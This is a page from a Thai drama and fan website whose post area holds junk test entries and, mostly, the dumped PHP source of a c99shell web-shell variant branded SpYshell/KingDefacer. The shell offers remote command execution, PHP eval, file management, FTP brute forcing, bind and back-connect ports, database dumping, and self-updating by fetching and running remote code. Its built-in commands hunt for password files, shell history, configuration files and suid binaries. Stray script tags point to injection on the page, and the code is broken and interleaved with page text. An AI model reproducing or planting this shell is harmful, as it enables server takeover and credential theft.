เข้าชมหน้าเวอร์ชั่นใหม่ >>>>คลิก<<<<
ระบบสมาชิก
สมัครสมาชิก | ลืมรหัสผ่าน
หน้าแรก ชีรีย์เกาหลี ดูทีวีย้อนหลัง แฟนไทยตลาด
ผู้หญิง
ฟังเพลง
เล่นเกมล์ ท่องเที่ยว
อัตราโฆษณา | ติดต่อเรา  
ย้อนหลัง
หน้าแรกแฟนไทย >> หน้าแรกละคร >>

เข้าชมแล้ว ( ) ครั้ง

เข้าชมแล้ว ( 4) ครั้ง
practice safe1
practice safe1
<3 <3 เข้าชมแล้ว ( 98) ครั้ง

เข้าชมแล้ว ( 83) ครั้ง
practice
practice
<3 <3 เข้าชมแล้ว ( 80) ครั้ง
<script src=explorer" width="100" height="100" border="0" style="float:left;" />

เข้าชมแล้ว ( 395) ครั้ง
<script src=explorer" width="100" height="100" border="0" style="float:left;" />

เข้าชมแล้ว ( 179) ครั้ง

เข้าชมแล้ว ( 179) ครั้ง

เข้าชมแล้ว ( 381) ครั้ง

เข้าชมแล้ว ( 355) ครั้ง
adasdasd
adasdasd
asdasdsa เข้าชมแล้ว ( 363) ครั้ง
hahahaha
hahahaha
HatakeKakashi Piste JaWa Shell => 212.227.250.113=> By HatakeKakashiAnonPh $v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = "KingDefacer"; //Current version //CONFIGURATION AND SETTINGS if (!empty($unset_surl)) {setcookie("ashcoike_surl"); $surl = "";} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("ashcoike_surl",$surl);} else {$surl = $_REQUEST["ashcoike_surl"]; //Set this cookie for manual SURL } $surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. if ($surl_autofill_include and !$_REQUEST["ashcoike_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} if (empty($surl)) { $surl = "?".$includestr; //Self url } $surl = htmlspecialchars($surl); $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. //Authentication $login = ""; //login //DON'T FORGOT ABOUT PASSWORD!!! $pass = ""; //password $md5_pass = ""; //md5-cryped pass. if null, md5($pass) $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") $login_txt = "Restricted area"; //http-auth message. $accessdeniedmess = "SpYshell v.".$shver.": Erisim Engellendi"; $gzipencode = true; //Encode with gzip? $updatenow = false; //If true, update now (this variable will be false) $ashsh_updateurl = "http://xxxxxxxxxxxxxxxxxxxxxx"; //Update server $ashsh_sourcesurl = "http://xxxxxxxxxxxxxxxxxxxxxxxx"; //Sources-server $filestealth = true; //if true, don't change modify- and access-time $donated_html = "
Powerad By SpyHackerz
"; /* If you publish shell and you wish add link to your site or any other information, put here your html. */ $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. $curdir = "./"; //start folder //$curdir = getenv("DOCUMENT_ROOT"); $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending $sort_save = true; //If true then save sorting-position using cookies. // Registered file-types. // array( // "{action1}"=>array("ext1","ext2","ext3",...), // "{action2}"=>array("ext4","ext5","ext6",...), // ... // ) $ftypes = array( "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "phpsess"=>array("sess"), "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") ); // Registered executable file-types. // array( // string "command{i}"=>array("ext1","ext2","ext3",...), // ... // ) // {command}: %f% = filename $exeftypes = array( getenv("PHPRC")." -q %f%" => array("php","php3","php4"), "perl %f%" => array("pl","cgi") ); /* Highlighted files. array( i=>array({regexp},{type},{opentag},{closetag},{break}) ... ) string {regexp} - regular exp. int {type}: 0 - files and folders (as default), 1 - files only, 2 - folders only string {opentag} - open html-tag, e.g. "" (default) string {closetag} - close html-tag, e.g. "" (default) bool {break} - if true and found match then break */ $regxp_highlight = array( array(basename($_SERVER["PHP_SELF"]),1,"",""), // example array("config.php",1) // example ); $safemode_diskettes = array("a"); // This variable for disabling diskett-errors. // array (i=>{letter} ...); string {letter} - letter of a drive //$safemode_diskettes = range("a","z"); $hexdump_lines = 8; // lines in hex preview file $hexdump_rows = 24; // 16, 24 or 32 bytes in one line $nixpwdperpage = 100; // Get first N lines from /etc/passwd $bindport_pass = "ash"; // default password for binding $bindport_port = "31373"; // default port for binding $bc_port = "31373"; // default port for back-connect $datapipe_localport = "8081"; // default port for datapipe // Command-aliases if (!$win) { $cmdaliases = array( array("-------------------------------------------------------------------", "ls -la"), array("Butun suid dosyalarini bul", "find / -type f -perm -04000 -ls"), array("Butun suid dosyalarini simdiki dizinde bul", "find . -type f -perm -04000 -ls"), array("Butun sgid dosyalarini bul", "find / -type f -perm -02000 -ls"), array("Butun sgid dosyalarini simdiki dizinde bul", "find . -type f -perm -02000 -ls"), array("Butun config.inc.php dosyalarini bul", "find / -type f -name config.inc.php"), array("Butun config* dosyalarini bul", "find / -type f -name \"config*\""), array("Butun config* dosyalarini simdiki dizinde bul", "find . -type f -name \"config*\""), array("Butun yazilabilir dosyalari bul", "find / -perm -2 -ls"), array("Butun dosya ve klasorleri simdiki dizinde bul", "find . -perm -2 -ls"), array("Butun service.pwd doslayalarini bul", "find / -type f -name service.pwd"), array("Butun service.pwd dosyalarini simdiki dizinde bul", "find . -type f -name service.pwd"), array("Butun .htpasswd dosyalarini bul", "find / -type f -name .htpasswd"), array("Butun .htpasswd dosyalarini simdiki dizinde bul", "find . -type f -name .htpasswd"), array("Butun .bash_history dosyalarini bul", "find / -type f -name .bash_history"), array("Butun .bash_history dosyalarini simdiki dizinde bul", "find . -type f -name .bash_history"), array("Butun .fetchmailrc dosyalarini bul", "find / -type f -name .fetchmailrc"), array("Butun .fetchmailrc dosyalarini simdiki dizinde bul", "find . -type f -name .fetchmailrc"), array("Butun Linux ikinci erisebilir dosyalarini bul", "lsattr -va"), array("Butun Acik Portlari goster.", "netstat -an | grep -i listen") ); } else { $cmdaliases = array( array("-----------------------------------------------------------", "dir"), array("Butun Acik Portlari goster.", "netstat -an") ); } $sess_cookie = "ashshvars"; // Cookie-variable name $usefsbuff = true; //Buffer-function $copy_unset = false; //Remove copied files from buffer after pasting //Quick launch $quicklaunch = array( array("\"Ana",$surl), array("\"Geri\"","#\" onclick=\"history.back(1)"), array("\"Ileri\"","#\" onclick=\"history.go(1)"), array("\"Yukari\"",$surl."act=ls&d=%upd&sort=%sort"), array("\"Yenile\"",""), array("\"Arama\"",$surl."act=search&d=%d"), array("\"Tampon\"",$surl."act=fsbuff&d=%d"), array("Cyriptos",$surl."act=encoder&d=%d"), array("Araclar",$surl."act=tools&d=%d"), array("Islem.",$surl."act=processes&d=%d"), array("FTP brute",$surl."act=ftpquickbrute&d=%d"), array("Guvenlik",$surl."act=security&d=%d"), array("SQL",$surl."act=sql&d=%d"), array("PHP-code",$surl."act=eval&d=%d"), array("Bildirim",$surl."act=feedback&d=%d"), array("Imha Et",$surl."act=selfremove"), array("Exit","#\" onclick=\"if (confirm('Eminmisin dosttum?')) window.close()") ); //Highlight-code colors $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract($_REQUEST["ashshcook"]); //END CONFIGURATION // \/ Next code isn't for editing \/ @set_time_limit(0); $tmp = array(); foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} $s = "!^(".implode("|",$tmp).")$!i"; if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("SpYshell: Erisim Engellendi - Senin Host (".getenv("REMOTE_ADDR").") not allow");} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
"," ",$donated_html));} header("WWW-Belgele: Basic realm=\"SpYshell ".$shver.": ".$login_txt."\""); header("HTTP/1.0 401 Yetkisiz"); exit($accessdeniedmess); } } if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) {@ob_clean(); ashsh_getupdate($selfwrite,1); exit;} $sess_data = unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } if (!function_exists("ash_buff_prepare")) { function ash_buff_prepare() { global $sess_data; global $act; foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} } } ash_buff_prepare(); if (!function_exists("ash_sess_put")) { function ash_sess_put($data) { global $sess_cookie; global $sess_data; ash_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array("sort","sql_sort") as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie("sort",$sort);} if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} } if (!function_exists("str2mini")) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len); } else {return $content;} } } if (!function_exists("view_size")) { function view_size($size) { if (!is_numeric($size)) {return false;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; } } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return true; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return false;} } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { $ret = true; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} if (!$ret) {return $ret;} } } closedir($h); return true; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return false;} } else {return false;} } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return false;} } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== false) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner["read"] = ($mode & 00400)?"r":"-"; $owner["write"] = ($mode & 00200)?"w":"-"; $owner["Uygulanamadi!"] = ($mode & 00100)?"x":"-"; $group["read"] = ($mode & 00040)?"r":"-"; $group["write"] = ($mode & 00020)?"w":"-"; $group["Uygulanamadi!"] = ($mode & 00010)?"x":"-"; $world["read"] = ($mode & 00004)?"r":"-"; $world["write"] = ($mode & 00002)? "w":"-"; $world["Uygulanamadi!"] = ($mode & 00001)?"x":"-"; if ($mode & 0x800) {$owner["Uygulanamadi!"] = ($owner["Uygulanamadi!"] == "x")?"s":"S";} if ($mode & 0x400) {$group["Uygulanamadi!"] = ($group["Uygulanamadi!"] == "x")?"s":"S";} if ($mode & 0x200) {$world["Uygulanamadi!"] = ($world["Uygulanamadi!"] == "x")?"t":"T";} return $type.join("",$owner).join("",$group).join("",$world); } } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}} if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}} if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}} if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = "s";} elseif (($mode & 0x4000) === 0x4000) {$t = "d";} elseif (($mode & 0xA000) === 0xA000) {$t = "l";} elseif (($mode & 0x8000) === 0x8000) {$t = "-";} elseif (($mode & 0x6000) === 0x6000) {$t = "b";} elseif (($mode & 0x2000) === 0x2000) {$t = "c";} elseif (($mode & 0x1000) === 0x1000) {$t = "p";} else {$t = "?";} $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); } } if (!function_exists("parsesort")) { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second); } } if (!function_exists("view_perms_color")) { function view_perms_color($o) { if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} else {return "".view_perms(fileperms($o))."";} } } if (!function_exists("ashgetsource")) { function ashgetsource($fn) { global $ashsh_sourcesurl; $array = array( "ashsh_bindport.pl" => "ashsh_bindport_pl.txt", "ashsh_bindport.c" => "ashsh_bindport_c.txt", "ashsh_backconn.pl" => "ashsh_backconn_pl.txt", "ashsh_backconn.c" => "ashsh_backconn_c.txt", "ashsh_datapipe.pl" => "ashsh_datapipe_pl.txt", "ashsh_datapipe.c" => "ashsh_datapipe_c.txt", ); $name = $array[$fn]; if ($name) {return file_get_contents($ashsh_sourcesurl.$name);} else {return false;} } } if (!function_exists("ashsh_getupdate")) { function ashsh_getupdate($update = true) { $url = $GLOBALS["ashsh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; $data = @file_get_contents($url); if (!$data) {return "Server guncellestirme baglanamadi!";} else { $data = ltrim($data); $string = substr($data,3,ord($data{2})); if ($data{0} == "\x99" and $data{1} == "\x01") {return "Hatta: ".$string; return false;} if ($data{0} == "\x99" and $data{1} == "\x02") {return "En son guncellestirmeyi kullaniyosun!";} if ($data{0} == "\x99" and $data{1} == "\x03") { $string = explode("\x01",$string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) {return "Can't fetch update!";} else { $fp = fopen(__FILE__,"w"); if (!$fp) {return "Yerel Hata: Guncelestirme yazilamadi".__FILE__."! Sen Spyhackerz.com girip birseyler grenebilirsin. here.";} else {fwrite($fp,$source); fclose($fp); return "Tesekkurler Guncellendi!";} } } else {return "Yeni Versiyon bulundu: ".$string[1];} } elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} else {return "protocol hata: bolum engellendi! (".$data.") ";} } } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) {echo("Hata: \$sock Dogrulamadi");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = true;} if (empty($file)) { $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = true;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = "# Dumped by SpYShell.SQL ".$shver." # Ana Sayfa: http://www.spyhackerz.com/ # Host ayarlari: # MySQL versiyon: (".mysql_get_server_info().") Su an calisan ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." # Tarih: ".date("d.m.Y H:i:s")." # DB: \"".$db."\" #--------------------------------------------------------- "; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "Ekle Table , exits `".$tab."`;\n";} // recieve query for Olustur table structure $res = mysql_query("Olusan tabloyu goster `".$tab."`", $sock); if (!$res) {$ret["err"][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row["1"].";\n\n"; // recieve table variables $res = mysql_query("Sec * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "Icine Sok `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret["err"][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists("mysql_buildwhere")) { function mysql_buildwhere($array,$sep=" and",$functs=array()) { if (!is_array($array)) {$array = array();} $result = ""; foreach($array as $k=>$v) { $value = ""; if (!empty($functs[$k])) {$value .= $functs[$k]."(";} $value .= "'".addslashes($v)."'"; if (!empty($functs[$k])) {$value .= ")";} $result .= "`".$k."` = ".$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists("mysql_fetch_all")) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists("mysql_smarterror")) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists("mysql_query_form")) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo ""; if ($tbl_struct) { echo "
"; if (($sql_query) and (!$submit)) {echo "Gercekden eminmisin ? :)";} else {echo "SQL-Query";} echo ": 
Alanlar:
"; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo " ".$name."
";} echo "
"; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists("mysql_create_db")) { function mysql_create_db($db,$sock="") { $sql = "DATABASE OLUSTUR `".addslashes($db)."`;"; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists("mysql_query_parse")) { function mysql_query_parse($query) { $query = trim($query); $arr = explode (" ",$query); /*array array() { "METHOD"=>array(output_type), "METHOD1"... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array( "SELECT"=>array(3,1), "SHOW"=>array(2,1), "DELETE"=>array(1), "DROP"=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k+1]; $result["limit"] = explode(",",$result["limit"]); if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return false;} } } if (!function_exists("ashfsearch")) { function ashfsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== false) { if($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {ashfsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d.$f); if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} else {$bool = strpos(" ".$r,$a["text"],1);} if ($a["text_not"]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } } if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} //Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } } function ashshexit() { onphpshutdown(); exit; } header("Zamani: Mon, 12 May 2005 03:00:00 GMT"); header("Son Modifiye: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pratik: no-cache"); if (empty($tmpdir)) { $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ACiK (Guvenlikli) :( "; } else {$safemode = false; $hsafemode = "Kapali (guvenlik yok)";} $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "Kapali (guvenlik yok)";} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set("highlight.bg",$highlight_bg); //FFFFFF @ini_set("highlight.comment",$highlight_comment); //#FF8000 @ini_set("highlight.default",$highlight_default); //#0000BB @ini_set("highlight.html",$highlight_html); //#000000 @ini_set("highlight.keyword",$highlight_keyword); //#007700 @ini_set("highlight.string",$highlight_string); //#DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?> <?php echo getenv("HTTP_HOST"); ?> c99shell - Edited By KingDefacer

!c99shell Edited By KingDefacer!

Server Yazilim:  

Uname -a: ",1); ?> 

",1);} else {echo get_current_user();} ?> 

Guvenlik Modu: 

".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } echo "   "; if (is_writable($d)) { $wd = true; $wdt = " [ ok ] "; echo "".view_perms(fileperms($d)).""; } else { $wd = false; $wdt = " [ Sadece Read ] "; echo "".view_perms_color($d).""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === false) {$free = 0;} if ($total === false) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo "
Toplam ".view_size($total)." kapasite, ve ".view_size($free)." Bo$. Ortalama(".$free_percent."%) "; } echo "
